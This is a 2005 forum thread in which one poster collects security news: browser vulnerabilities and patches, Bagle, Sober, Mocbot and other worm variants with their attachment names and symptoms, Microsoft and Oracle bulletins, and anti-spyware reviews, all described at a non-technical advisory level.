Users should avoid links in unsolicited email messages and untrusted URLs regardless of which browser they use. Based on past experience, the Mozilla foundation has a priority on security, so I’m certain this will be addressed soon with a new release of Firefox.
Firefox/Deerpark all versions – Critical Security Warning
http://news.zdnet.com/2100-3513_22-5856201.html
http://techrepublic.com.com/2100-1009_11-5856201.html
http://secunia.com/advisories/16764/
http://security-protocols.com/advisory/sp-x17-advisory.txtTom Ferris has discovered a vulnerability in Firefox, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially to compromise a user’s system. The vulnerability is caused due to an error in the handling of an URL that contains the 0xAD character in its domain name. This can be exploited to cause a heap-based buffer overflow.
Successful exploitation crashes Firefox and may potentially allow code execution but requires that the user is tricked into visiting a malicious web site or open a specially crafted HTML file. The vulnerability has been confirmed in version 1.0.6, and is reported to affect versions prior to 1.0.6, and version 1.5 Beta 1.
-
September 10, 2005 at 8:37 pm #3065689
Mozilla Firefox – IDN Patch corrects critical vulnerabilities
by harry waldron, cpcu, ccp · about 18 years, 6 months ago
In reply to Harry Waldron
One day after public disclosure of the vulnerability, an XPI patch was provided that deactivates IDN processing. This tested out well for me
Mozilla Firefox – IDN Patch corrects critical vulnerabilities
https://addons.mozilla.org/messages/307259.htmlOn September 9, the Mozilla team released a configuration change which, as a temporary measure to work around this problem, disables IDN in the browser. IDN functionality will be restored in a future product update. The fix is either a manual configuration change or a small download which will make this configuration change for the user.
-
September 12, 2005 at 4:38 pm #3065518
Bagle.CZ – New variant using CPL extensions
by harry waldron, cpcu, ccp · about 18 years, 6 months ago
In reply to Harry Waldron
This new variant was massively spammed via email and while the downloader component doesn’t appear to be working, this new variant can deactivate existing AV or FW software installed on the PC. The CPL extensions are typically found inside of a zipped archieve. This modified variant bypasses detectability in most AV products and users should be cautious in handling email messages.
McAfee information on this massively spammed variant
http://vil.nai.com/vil/content/v_129588.htmTrend information
http://secunia.com/virus_information/21411/trojbagle.cz/
Sophos information
http://www.sophos.com/virusinfo/analyses/trojdropperbc.htmlISC information
http://isc.sans.org/diary.php?storyid=665Multiple new variants of this threat were recently mass spammed. Filenames include 1.cpl and price.cpl and may arrive in a ZIP file named newprice.zip , price_09.zip, price some number.zip , etc. The variants seen thus far are non functional, and deemed a low risk. The first such variant drops a corrupt file (ceeweewe.exe) to the %windir%. The corrupt file is detected as W32/Bagle.dam. Detection will be enhanced in the 4580 DAT release to detect and delete these newly discovered damaged variants. This is a generic detection covering many variants of the W32/Bagle@MM virus when sent in “CPL” format.
-
September 16, 2005 at 1:08 pm #3056533
MS05-039: W32.Iberio new PnP Internet worm
by harry waldron, cpcu, ccp · about 18 years, 6 months ago
In reply to Harry Waldron
W32.Iberio is a worm with back door capabilities that spreads by exploiting the Microsoft Windows Plug and Play Buffer Overflow Vulnerability — as described in Microsoft Security Bulletin MS05-039
-
September 19, 2005 at 1:08 pm #3059224
Bagle.CI/CJ — Multiple New Bagle Variants
by harry waldron, cpcu, ccp · about 18 years, 6 months ago
In reply to Harry Waldron
This new variant seems to closely ressemble other variants, and it is packaged in a way that they require new signature files by most AV vendors
Bagle.CI – McAfee Information (DAT 4584 required)
http://vil.nai.com/vil/content/v_135995.htmBagle.CJ – McAfee Information (DAT 4585 required)
http://vil.nai.com/vil/content/v_135996.htmBagle.BI — New Bagle Variant (Medium Risk by F-Secure)
http://secunia.com/virus_information/21638/bagle.bi/
http://secunia.com/virus_information/21640/trojbagle.da/
http://secunia.com/virus_information/21639/bagledl-u/
Bagle.BI — Internet Storm Center article
http://isc.sans.org/diary.php?storyid=682Attachments arrive as:
09_price.zip
newprice.zip
new_price.zip
price2.zip
price.zip
price_new.zip -
September 21, 2005 at 7:19 am #3058580
Bagle Virus Spam Attack — 11 new variants in one day
by harry waldron, cpcu, ccp · about 18 years, 6 months ago
In reply to Harry Waldron
Earlier this week, the Bagle malware authors used an approach of creating a number of new viruses and spamming them massively in the wild. Each new wave of infected emails contained a different variation of the virus which was designed to elude detection by AV vendors. F-Secure set an all-time record will 11 releases in one day
Excellent Writeup by F-Secure on September 20th
Email-Worm.Win32.Bagle.cy (aka Bagle.BI)
Email-Worm.Win32.Bagle.cz
Email-Worm.Win32.Bagle.da
Email-Worm.Win32.Bagle.db
Email-Worm.Win32.Bagle.dc
Email-Worm.Win32.Bagle.dd
Email-Worm.Win32.Bagle.de
Email-Worm.Win32.Bagle.df -
September 25, 2005 at 6:40 am #3062071
SANS: Bouncing Malware writeup featuring James Bond theme
by harry waldron, cpcu, ccp · about 18 years, 6 months ago
In reply to Harry Waldron
The folks at the Internet Storm Center have an interesting series that illustrates the dangerous of advanced spyware threats. This one is dedicated to the James Bond fans and provides an interesting account of the dangers in using the Internet without proper safeguards or precautions.
-
September 25, 2005 at 6:40 pm #3061997
Opera 8.50 browser – Adbar removed & latest security updates
by harry waldron, cpcu, ccp · about 18 years, 6 months ago
In reply to Harry Waldron
Opera 8.50 was recently improved to remove the adbar on the free version. So far the new version is working well and presents no conflicts with IE 6 SP2 or Mozilla Firefox 1.5.
Release Note
This release is a recommended security upgrade.
At a Glance
- Advertisement banner removed
- Registration options removed
- Updated end-user license agreement
- Browser JavaScript fixes broken Web sites on the fly
Changes since 8.02
User interface
- Removed advertising banners and all dialogs and menus related to advertising, registration, and license codes.
- Solved issue with Opera reverting explicit user setting to use program as handler rather than plug-in.
- Removed support for branded banners.
Security
- Fixed issue reported in Secunia Advisory 16645: Attachment URLs now used instead of cache URLs for viewing attachments.
- Fixed drag-and-drop vulnerability allowing unintentional file uploads. Issue reported by mikx.de.
- Improved handling of must-revalidate cache directive for HTTPS pages.
- Fixed display issue with cookie comment encoding.
Miscellaneous
- Included Browser JavaScript by default. On first run after install/upgrade, Opera will fetch a fresh browser.js file and start using it.
- Multiple stability fixes.
Download Link for version 8.50:
-
September 26, 2005 at 2:40 pm #3063342
InfoWorld – Corporate Spyware Product Evaluations
by harry waldron, cpcu, ccp · about 18 years, 6 months ago
In reply to Harry Waldron
F-Secure was the top corporate choice, based on it’s real-time effectiveness in stopping a broad range of spyware and adware infections.
InfoWorld – Corporate Spyware Product Evaluations
F-Secure selected as top corporate Spyware product overall
QUOTE: F-Secure Anti-Virus Client Security has one of the best, most comprehensive security bundles available, although it suffers a bit from a disjointed administration user interface. One of three anti-spyware solutions in this review that includes anti-virus capabilities in the same package, Anti-Virus Client Security’s real-time protection stopped all attempts to infect my test clients. Reporting is browser-based and provides ample predefined templates. Because of its awesome real-time protection and overall performance, Anti-Virus Client Security 6 received the highest score of the ten products reviewed.
-
September 27, 2005 at 10:40 am #3063001
Suclove.A – New version of LoveLetter virus emerges
by harry waldron, cpcu, ccp · about 18 years, 6 months ago
In reply to Harry Waldron
A new virus ressembling the social engineering approach of the Love Letter virus in May 2000 has emerged. This one is easy to block and more of a threat to home users.
McAfee information
http://vil.nai.com/vil/content/v_136187.htmTrend and Symantec information
http://secunia.com/virus_information/21881/suclove.a/Payload: Opens a back door that allows a remote attacker to have unauthorized access to the compromised computer.
Large scale e-mailing: Uses MS Outlook to send a copy of the worm to all users in the Outlook address book.
Degrades performance: Creates a mass-mailing of itself, which may impact performance.
Releases confidential info: Attempts to steal confidential system information.
EMAIL TO AVOID
Subject: Love, for Forgiveness :->
Body: I love u please forgive me!…
Attachment: LoveLetter.doc.exeSubject: Read my letter for you
Body: this was created from the deep inside my heart.
Attachment: LoveLetter.doc.exe -
September 28, 2005 at 2:40 pm #3061214
Backdoor.Hesive – Zero Day MS Access Jet Engine Exploit
by harry waldron, cpcu, ccp · about 18 years, 6 months ago
In reply to Harry Waldron
Please be careful with all email messages containing Microsoft Access attachments. This new exploit capitalizes on an unpatched MS Jet Engine vulnerability that creates a compromise to system security until the Trojan Horse is removed.
While this new zero day attack is very rare, it could could surprise individuals if we were massively spammed in the wild, Microsoft Access data base email attachments are usually thought of as being safe to open. Thus we should always be cautious on ANY attachment type and the best practice is to never open attachments regardless of whether they appear safe or not.
Backdoor.Hesive – Zero Day MS Jet Engine Exploit
http://secunia.com/virus_information/21954/hesive/Backdoor.Hesive is a Trojan horse that opens a back door on the compromised computer and allows a remote attacker unauthorized access. The Trojan may arrive as a Microsoft Access file that exploits the Microsoft Jet Database Engine Malformed Database File Buffer Overflow Vulnerability (described in Bugtraq ID 12960).
Microsoft Jet Database Engine Malformed Database File Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/12960/infoSolution: Currently we are not aware of any vendor-supplied patches for this issue
Allows the remote attacker the ability to perform the following actions:
List active ports
List processes, services, and threads
Download and execute remote files
Upload files
Run a system shell
Modify registry values
End processes
Get system information
Get network information
Post collected data to hostile web site -
September 29, 2005 at 10:40 am #3061844
Microsoft Office 2003 SP2 released
by harry waldron, cpcu, ccp · about 18 years, 6 months ago
In reply to Harry Waldron
Several Microsoft service packs were released for the Office 2003 product family.Microsoft Office 2003 SP2 Released
http://support.microsoft.com/kb/887616Security bulletins that are associated with the service pack
MS05-023/KB890169: Vulnerabilities in Microsoft Word could lead to remote code execution
MS04-027/KB884933: Vulnerability in WordPerfect converter could allow code executionMS04-028/KB833987: Buffer overrun in JPEG processing (GDI+) could allow code executionMicrosoft Visio 2003 SP2 Released
http://support.microsoft.com/kb/887622Security bulletins that are associated with the service pack
MS04-028/KB833987: Buffer overrun in JPEG processing (GDI+) could allow code execution
Microsoft Outlook 2003 Junk Email Filter Update
http://support.microsoft.com/kb/904631This update should improve your junk mail filtering accuracy.
-
October 4, 2005 at 9:07 pm #3071407
Spybot.YCL – Attacks 7 major unpatched vulnerabilities or other weak security vulnerabilities
by harry waldron, cpcu, ccp · about 18 years, 6 months ago
In reply to Harry Waldron
This new version of Spybot has to be one of the most comprehensive attacks I’ve seen today for this large family of viruses. It attacks weak passwords, uses existing backdoor infections, plus attacks through some of the most prominent security vulnerabilities if a system is unpatched.
Spybot.YCL – Attacks 7 major unpatched vulnerabilities or other weak security vulnerabilities
1. Attacks several major security vulnerabilities in unpatched Microsoft, Dameware, and Veritas software:
- The Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability (described in Microsoft Security Bulletin MS03-026).
- The Microsoft Windows Local Security Authority Service Remote Buffer Overflow (as described in Microsoft Security Bulletin MS04-011)
- The Microsoft Windows Plug and Play Buffer Overflow Vulnerability (described in Microsoft Security Bulletin MS05-039)
- The Microsoft Windows ntdll.dll Buffer Overflow Vulnerability (described in Microsoft Security Bulletin MS03-007).
- The Microsoft Windows SSL Library Denial of Service Vulnerability (described in Microsoft Security Bulletin MS04-011).
- The Microsft Windows ASN.1 Vulnerability (as described in Microsoft Security Bulletin MS04-007).
- The DameWare Mini Remote Control Server Pre-Authentication Buffer Overflow vulnerability (as described in Bugtraq ID 9213).
- The VERITAS Backup Exec Agent Browser Remote Buffer Overflow Vulnerability (as described here).
2. Spreads over network shares and Microsoft SQL server using weak usernames and passwords
3. Spreads to compromised computers by using back doors left behind by other malware such as:
- W32.Mydoom@mm
- W32.Beagle@mm
- Backdoor.Netdevil
- Backdoor.Optix
- Backdoor.Subseven
-
October 6, 2005 at 5:11 am #3069443
Sober.R – MEDIUM RISK by McAfee and difficult to remove
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
The Sober virus family is always one to watch. This one is spreading rapidly and McAfee has declared Medium Risk. It is also very difficult to clean until enhanced cleaning capabilities are provided by AV companies.
Sober.R – MEDIUM RISK by McAfee
http://vil.nai.com/vil/content/v_136390.htm
Other AV companies
http://secunia.com/virus_information/22225/sober.s/
EMAIL TO AVOID – English & German variantsSubject: Your new Password
Body: Your password was successfully changed! Please see the attached file for detailed information.
This mass-mailing email virus arrives in an email message with one of the following attachment names: KlassenFoto.zip, pword_change.zipSPECIAL INSTRUCTIONS FOR INFECTED PCs
Cleaning this new variant is difficult as some new techniques used by the virus writer lock down security of infected files, (blocks access to files using special registry settings), so that you have to clean in SAFE MODE until McAfee releases it’s next DAT file (which will reset file access permissions in the registry to allow direct cleaning).
Quote: Due to the nature in which this virus operates once a machine is successfully infected, read-access to its file may be denied. The AV scanner will not be able to detect the file in this case. Because of this, if a machine is suspected to be infected, users are recommended to follow the procedure below:
Reboot the system into Safe Mode (hit the F8 key as soon as the Starting Windows text is displayed, choose Safe Mode.
Run a system scan using the specified engine/DATs.
Delete files flagged as infected
Restart machine in default mode. -
October 7, 2005 at 9:07 am #3069966
Windows Vista – Review of Beta 1 by Tech Republic
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
The following 3-part review was featured by Tech Republic on the enhancements that will be forthcoming in Windows Vista, which is Microsoft’s next generation operating system for client workstations.
http://www.winsupersite.com/reviews/winvista_beta1_01.asp
-
October 9, 2005 at 5:10 am #3070230
Common Malware Enumeration – New CME standard for AV vendors
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
CERT provides one of the best websites related to computer security. They have recently addressed a major issue among anti-virus companies, where common naming conventions don’t exist due to the competitive nature of being first many times. Also, some AV products can handle several variants with a single defiition, where other AV vendors must specifically define a new variant each time a new compression or packing technique is used on the executable.
Chris Mosby, a very talented security modertor in My IT Forums commented on this need in an “Open Letter to Anti-Virus Software Companies” in November 2004. This new system won’t be perfect, but it’s a step in the right direction. It’ll help companies like the one I work for which uses corporate McAfee VS 8.0i on the desktop and SAV for email filtering.
Common Malware Enumeration (CME) – Home Page
http://cme.mitre.org/Common Malware Enumeration (CME) – FAQ
http://cme.mitre.org/about/faqs.htmlCommon Malware Enumeration (CME) – Current List
http://cme.mitre.org/data/list.htmlCommon Malware Enumeration (CME) – How it Works
http://cme.mitre.org/cme/process.htmlCommon Malware Enumeration (CME) – Press Release
http://cme.mitre.org/about/docs.html -
October 10, 2005 at 1:11 pm #3060270
Zafi.F – Appears to be legitimate MSN email
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
Zafi.F is spreading via email in English, Italian, Spanish, Russian, Swedish and several other languages. This new HTML based variant is authentic in appearance, from a social engineering perspective.
SECUNIA
http://secunia.com/virus_information/22349/zafi.f/
F-SECURE
http://www.f-secure.com/v-descs/zafi_f.shtmlMcAfee
http://vil.nai.com/vil/content/v_136426.htmDO NOT OPEN ATTACHMENTS ENDING WITH: pif, cmd, bat, com or zip file.
-
October 11, 2005 at 7:31 pm #3069067
Microsoft Security Bulletins – October 2005
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
-
October 12, 2005 at 5:30 pm #3060038
October Microsoft Security Bulletins – more in-depth information
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
Microsoft Security Release – October 2005
The following provides an overview of several important updates.
Microsoft Security Release – October 2005
http://www.microsoft.com/technet/security/Bulletin/ms05-Oct.mspxInternet Storm Center – Excellent Technical Analysis
http://isc.sans.org/diary.php?date=2005-10-11Vulnerability in DirectShow Could Allow Remote Code Execution (904706) – Critical
http://www.microsoft.com/technet/security/Bulletin/ms05-050.mspxVulnerabilities in MSDTC and COM+ Could Allow Remote Code Execution (902400) – Critical
http://www.microsoft.com/technet/security/Bulletin/ms05-051.mspxCumulative Security Update for Internet Explorer (896688) – Critical
http://www.microsoft.com/technet/security/Bulletin/ms05-052.mspxVulnerability in the Client Services for Netware Could Allow Remote Code Execution (899589) – Important
http://www.microsoft.com/technet/security/Bulletin/ms05-046.mspxVulnerability in Plug and Play Could Allow Remote Code Execution and Local Elevation of Privilege (905749) – Important
http://www.microsoft.com/technet/security/Bulletin/ms05-047.mspxVulnerability in the Microsoft Collaboration Objects Could Allow Remote Code Execution (907245) – Important
http://www.microsoft.com/technet/security/Bulletin/ms05-048.mspxVulnerabilities in Windows Shell Could Allow Remote Code Execution (900725) – Important
http://www.microsoft.com/technet/security/Bulletin/ms05-049.mspxVulnerability in the Windows FTP Client Could Allow File Transfer
Location and Tampering (905495) – Moderate
http://www.microsoft.com/technet/security/Bulletin/ms05-044.mspxVulnerability in Network Connection Manager Could Allow Denial Service (905414) – Important
http://www.microsoft.com/technet/security/Bulletin/ms05-045.mspx -
October 17, 2005 at 1:47 pm #3057965
Microsoft Technet Security: New Learning Paths training Facility
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
Microsoft’s Technet Security team is introducting a new Learning Paths website that features resources on security threats and appropriate controls. Each month new articles and training materials will be featured to provide on-going training for security professionals.
http://www.microsoft.com/technet/security/learning/default.mspx
Featured This Month:
Internal Threats: Mitigate the Risks in Your Environment
Today’s IT Professionals work in a challenging environment where there’s a constant effort to protect resources and vital information from internal misuse. Attend this series and learn about the risks, business challenges and recommendations for protecting your network from internal threats. We will cover topics such as Security risk management, assessment, and implementation as well as steps for meeting your business needs of operating in a more secure environment
-
October 17, 2005 at 5:47 pm #3057890
PC World – Evaluation of 11 Anti-Spyware Products
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
In the November 2005 issue of PC World magazine, 11 different products are evaluated. Webroot Spysweeper continues to score near the top in all evaluations. The MSAS beta release also had a positive review and scored as one of the best free products. It’s always best to look at more than one evaluation, as the review team can rank categories differently.
-
October 20, 2005 at 6:38 am #3044714
Microsoft October Security Bulletins – Exploits in-the-wild
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
So far, there are no published reports for MS05-051 which some security firms feel has the potential to be crafted into a possible Internet worm, that could especially impact Windows 2000 based PCs and Servers. At least 3 proof-of-concept exploits were developed within a couple of days of the October 11th updates, so companies should carefully test their applications and patch expediently. All users should stay as up-to-date as possible on any security patches that are released.
» 2005-10-13 : Microsoft Collaboration Data Objects Buffer Overflow PoC Exploit (MS05-048)
» 2005-10-13 : Microsoft Windows Network Connection Manager Local DoS Exploit (MS05-045)
» 2005-10-13 : Microsoft Windows FTP Client File Location Tampering Exploit (MS05-044)
-
October 20, 2005 at 6:38 am #3044712
Netscape 8.04 released to address critical security issues
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
All Netscape 8.0x users should update to the latest version to stay protected as recent improvements in security have been released
http://browser.netscape.com/ns8/security/alerts.jsp
Fixed in Netscape Browser 8.0.4
• MFSA 2005-58 Firefox 1.0.7 / Mozilla Suite 1.7.12 Vulnerability Fixes• MFSA 2005-57 IDN heap overrun using soft-hyphens -
October 20, 2005 at 6:38 am #3044713
Oracle RDBMS – Critical security patches released in October
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
During October, Oracle released several critical security patches that companies should quickly test and apply to safeguard information in these data base repositories.
2005-10-19 : Oracle Products Buffer Overflow and SQL Injection Vulnerabilities
Multiple vulnerabilities were identified in various Oracle products, which may be exploited by remote or local attackers to cause a denial of service, execute arbitrary commands, conduct SQL injection attacks and cross site scripting attacks, or bypass certain security restrictions. These flaws are due to unspecified errors in Oracle Database Server, Application Server, Collaboration Suite, E-Business Suite, Applications, Enterprise Manager, PeopleSoft Enterprise, and JD Edwards EnterpriseOne. No further details have been disclosed.
-
October 23, 2005 at 6:36 am #3045113
MS05-047 — Mocbot IRC Worm in the wild
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
A new attack based on October’s security bulletin MS05-047 surfaced overnight. This new threat remains at low risk currently.
MS05-047 — Mocbot IRC Worm in the wild
http://secunia.com/virus_information/22746/irc-mocbot/
http://www.f-secure.com/v-descs/mocbot.shtml
http://vil.nai.com/vil/content/v_136637.htmThis botnet client was spread using the MS05-047 vulnerability in October 2005. This threat appears to be the first of its kind to exploit the recent MS05-047 Microsoft Windows vulnerability.
This trojan installs itself in the WINDOWS SYSTEM directory as wudpcom.exe. It creates a service called “wudpcom”. Once instructed, the bot scans the class A subnet addresses, sending SYN packets via TCP 139 (netbios), and 445 (microsoft-ds).
SYMPTOMS
1. Heavy netbois and microsoft-ds network traffic
2. Presense of the file wudpcom.exe in the WINDOWS SYSTEM directory
3. TCP 18067 connections to hostile websites -
October 25, 2005 at 2:42 am #3043463
MS05-037 — Mocbot IRC Worm in the wild
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
A new attack based on August’s security bulletin MS05-039 surfaced overnight. This new threat remains at low risk currently. This was initially reported as an MS05-047 exploit, but after further analysis McAfee has confirmed that while MS05-047 code was present, the MS05-039 exploit was used as the key method to infect unpatched PCs.
MS05-039 — Mocbot IRC Worm in the wild
http://secunia.com/virus_information/22746/irc-mocbot/
http://www.f-secure.com/v-descs/mocbot.shtml
http://vil.nai.com/vil/content/v_136637.htmThis botnet client was spread using the MS05-039 vulnerability in October 2005. This trojan installs itself in the WINDOWS SYSTEM directory as wudpcom.exe. It creates a service called “wudpcom”. Once instructed, the bot scans the class A subnet addresses, sending SYN packets via TCP 139 (netbios), and 445 (microsoft-ds).
SYMPTOMS
1. Heavy netbois and microsoft-ds network traffic
2. Presense of the file wudpcom.exe in the WINDOWS SYSTEM directory
3. TCP 18067 connections to hostile websites— AVERT / McAfee Update Oct 23, 2005 — After further analysis, AVERT has confirmed that this threat does not exploit MS05-047, but rather MS05-039. Initial analysis suggested the MS05-047 was being exploited due to similarities between those exploits (including overlapping code between publicly available source code), field infection reports where administrators incorrectly stated that machines were patched from MS05-039, and similarities between an earlier MS05-039 exploiting bot, where the only significant change was the exploit code being used.
Additionally, AVERT has confirmed that automated propagation has/had been configured on remote IRC servers, such that infected systems that are able to connect to the remote IRC server are immediately instructed to seek out vulnerable systems to infect them. This threat exploits the MS05-039 Microsoft Windows vulnerability.
-
October 25, 2005 at 6:36 am #3046387
MS05-047: Two new exploits developed from MS October security bulletins
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
Two more new exploits have developed as malicious individuals work to reverse engineer the changes and discover code weaknesses in unpatched systems. These new potential attacks are based on the MS05-047 Microsoft Security Bulletin issued in October. It’s always a best practice to patch as soon as Microsoft performs a release which is usually the second Tuesday of each month.
2005-10-24 : Microsoft Windows Plug and Play “Umpnpmgr.dll” DoS Exploit (MS05-047)
2005-10-21 : Microsoft Windows Plug and Play “Umpnpmgr.dll” Remote Exploit (MS05-047)
-
October 26, 2005 at 10:36 am #3045556
MS05-039 — Mocbot IRC Worm in the wild
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
? A new attack based on August’s security bulletin MS05-039 surfaced overnight. This new threat remains at low risk currently.? This was initially reported as an MS05-047 exploit, but after further analysis McAfee has confirmed that while MS05-047 code was present, the MS05-039 exploit was used as the key method to infect unpatched PCs.
MS05-039 — Mocbot IRC Worm in the wild
http://secunia.com/virus_information/22746/irc-mocbot/
http://www.f-secure.com/v-descs/mocbot.shtml
http://vil.nai.com/vil/content/v_136637.htmThis botnet client was spread using the MS05-039 vulnerability in October 2005. This trojan installs itself in the WINDOWS SYSTEM directory as wudpcom.exe. It creates a service called “wudpcom”. Once instructed, the bot scans the class A subnet addresses, sending SYN packets via TCP 139 (netbios), and 445 (microsoft-ds).
SYMPTOMS
1. Heavy netbois and microsoft-ds network traffic
2. Presense of the file wudpcom.exe in the WINDOWS SYSTEM directory
3. TCP 18067 connections to hostile websites— AVERT / McAfee Update Oct 23, 2005 — After further analysis, AVERT has confirmed that this threat does not exploit MS05-047, but rather MS05-039. Initial analysis suggested the MS05-047 was being exploited due to similarities between those exploits (including overlapping code between publicly available source code), field infection reports where administrators incorrectly stated that machines were patched from MS05-039, and similarities between an earlier MS05-039 exploiting bot, where the only significant change was the exploit code being used.
Additionally, AVERT has confirmed that automated propagation has/had been configured on remote IRC servers, such that infected systems that are able to connect to the remote IRC server are immediately instructed to seek out vulnerable systems to infect them. This threat exploits the MS05-039 Microsoft Windows vulnerability.
-
October 26, 2005 at 10:36 am #3045557
Windows XP Security Guide – New 2.1 version released
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
Microsoft has just updated the Windows XP security guide and this free resource can be found through the following link:
Any IT environment is only as secure as its weakest link. Unfortunately, client operating systems are often overlooked during security projects. As your organization plans to implement Microsoft® Windows® XP Professional with Service Pack 2 (SP2), ensure that security is an integral part of your deployment plans.
Although the default installation of Windows XP is quite secure, it is important to remember the trade-offs that exist between security, usability, and functionality of the client computers in your environment. A thorough understanding of these trade-offs places your organization in a position to maximize the security of your Windows XP deployment.
The guide provides specific recommendations about how to harden computers that run Windows XP with SP2 in three distinct environments:
• Enterprise Client (EC). Client computers in this environment are located in an Active Directory® directory service domain and only need to communicate with systems that run Windows 2000 or later versions of the Windows operating system.
• Stand-Alone (SA). Client computers in this environment are not members of an Active Directory domain and may need to communicate with systems that run Windows NT® 4.0.
•
Specialized Security – Limited Functionality (SSLF). Concern for security in this environment is so great that a significant loss of functionality and manageability is acceptable. For example, military and intelligence agency computers operate in this type of environment.
-
October 26, 2005 at 4:19 pm #3045453
Virkel.A – New sophisticated Instant Messaging virus
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
This new Instant Messenger (IM) threat should be closely watched as it contains a security backdoor and other sophisticated capabilities.
http://secunia.com/virus_information/22890/virkel.a/
Virkel is a backdoor with IM (Instant Messenger) spreading capabilities. It was first found on October 26th, 2005. The backdoor can provide a hacker with information about a system, work as a proxy, update itself, perform a Denial of Service (DoS) attack, open remote shell, download files. It also kills processes of anti-virus and security software and blocks access to many different sites that belong to anti-virus and security software vendors. -
October 30, 2005 at 3:15 am #3115154
Microsoft documents security improvements planned for IE 7
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
As noted in this Tech Republic Article, Internet Explorer version 7 will support a more robust protocol for encrypting user data and securing online transactions.
http://blogs.msdn.com/ie/archive/2005/10/22/483795.aspx
QUOTE: In a posting on the Microsoft Internet Explorer blog, IE program manager Eric Lawrence said that IE7 would support the Transport Layer Security (TLS) protocol by default.
Lawrence also explained how IE7 will behave differently from earlier versions when it encounters potential security problems.
“Whenever IE6 encountered a problem with a HTTPS-delivered Web page, the user was informed via a modal dialog box and was asked to make a security decision. IE7 follows the XPSP2 ‘secure by default’ paradigm by defaulting to the secure behavior,” said Lawrence.
IE7 will not give users the option of seeing both secure and insecure items within an HTTPS page. With IE6, this option appears when the browser encounters an HTTPS page that includes some HTTP content. But in IE7, only the secure content will be rendered by default, forcing the user to choose to access the rest via the information bar.
“This is an important change because very few users (or web developers) fully understand the security risks of rendering HTTP-delivered content within a HTTPS page,” Lawrence claimed.
-
October 30, 2005 at 7:15 am #3115124
Article: Oracle password system comes under fire
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
Data base Administrators should watch for further developments as this weakness will most likely be corrected in the future.
Article: Oracle password system comes under fire
QUOTE: Attackers could easily uncover Oracle database users’passwords because of a weak protection mechanism, putting corporate data at risk of exposure, experts have warned.
The technique Oracle uses to store and encrypt user passwords doesn’t provide sufficient security, said Joshua Wright of the SANS Institute and Carlos Sid of Royal Holloway college, University of London.
-
October 31, 2005 at 10:33 am #3114411
New AIM worm carries Windows Rootkit
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
I don’t think this one is widespread, but based on the stealth-like nature of rootkits, it’s probably both difficult to detect and remove.
http://news.zdnet.com/2100-1009_22-5920403.html
A worm found spreading via America Online’s Instant Messenger is carrying a nastier punch than usual, a security company has warned. The unnamed worm delivers a cocktail of unwanted software, including a so-called rootkit, security experts at FaceTime Communications said Friday. A rootkit is a tool designed to go undetected by the security software used to lock down control of a computer after an initial hack.
-
October 31, 2005 at 2:31 pm #3114220
phpBB 2.0.18 – Special Halloween release has security improvements
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
Forum Administrators should move to the latest versions of phpBB, as security improvements continue to be made to this highly flexible and functional environment.
http://www.phpbb.com/phpBB/viewtopic.php?t=336756
The phpBB Group is pleased to announce the release of phpBB 2.0.18, “The Halloween Special” release. This is a major update to the 2.0.x codebase and includes fixes for numerous bugs reported by users to our Bug Tracker, as well as updates to those issues identified by the recent security audit of the code and a couple of security issues reported to us. In addition we have backported a further feature from our “Olympus” codebase to change the way automatic logins are handled.
-
November 1, 2005 at 6:34 am #3114964
Apple Computers release Mac OS X security updates
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
Apple Computers has issued some important security updates that should be applied promptly to ensure a more secure computing environment.
http://isc.sans.org/diary.php?storyid=811
Apple has released security updates for OS X, the new version 10.4.3 addresses issues in Finder, Software Update, memberd, Keychain and Kernel. It’s time for the Mac folks to patch the boxes….
OS X 10.4.3 can be downloaded from http://www.apple.com/support/downloads/
-
November 1, 2005 at 2:32 pm #3116748
Bagle DL/DK – Two New November Variants
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
Usually, early in the month the Bagle author launches the next generation of variants. McAfee has just published preliminary information on this.
Bagle DL/DK – Two New November Variants
http://secunia.com/virus_information/23094/bagle.dl/
http://secunia.com/virus_information/23093/bagle.dk/QUOTE: This is a downloader trojan. However, like previous Bagle variants, it is likely that in the near future, the author(s) will post an accompanying EXE file on a remote server, which SPAMs new versions of Bagle (not to addresses harvested on the local system, but to addresses specified in spam lists also on remote web servers). This trojan was mass-spammed in a ZIP attachment and may use any one of the following filenames:
The_new_prices.zip
Info_Prices.zip
Health_and_knowledge.zip
sms_text.zip
max.zip
Business.zip
Business_dealing.zip -
November 2, 2005 at 6:32 am #3116550
Spybot.ZIF – May report vulnerable CISCO routers to hackers
by harry waldron, cpcu, ccp · about 18 years, 5 months ago
In reply to Harry Waldron
Spybot is used commonly by hackers as it represents it tries multiple approaches to find weaknesses in the security defenses, including both Microsoft and non-Microsoft vulnerabilities. Thus, it’s important to patch everything, including CISCO routers as this new variant has the potential to report vulnerable ones back to these malicious groups of individuals.
Spybot.ZIF – Internet Storm Center Link
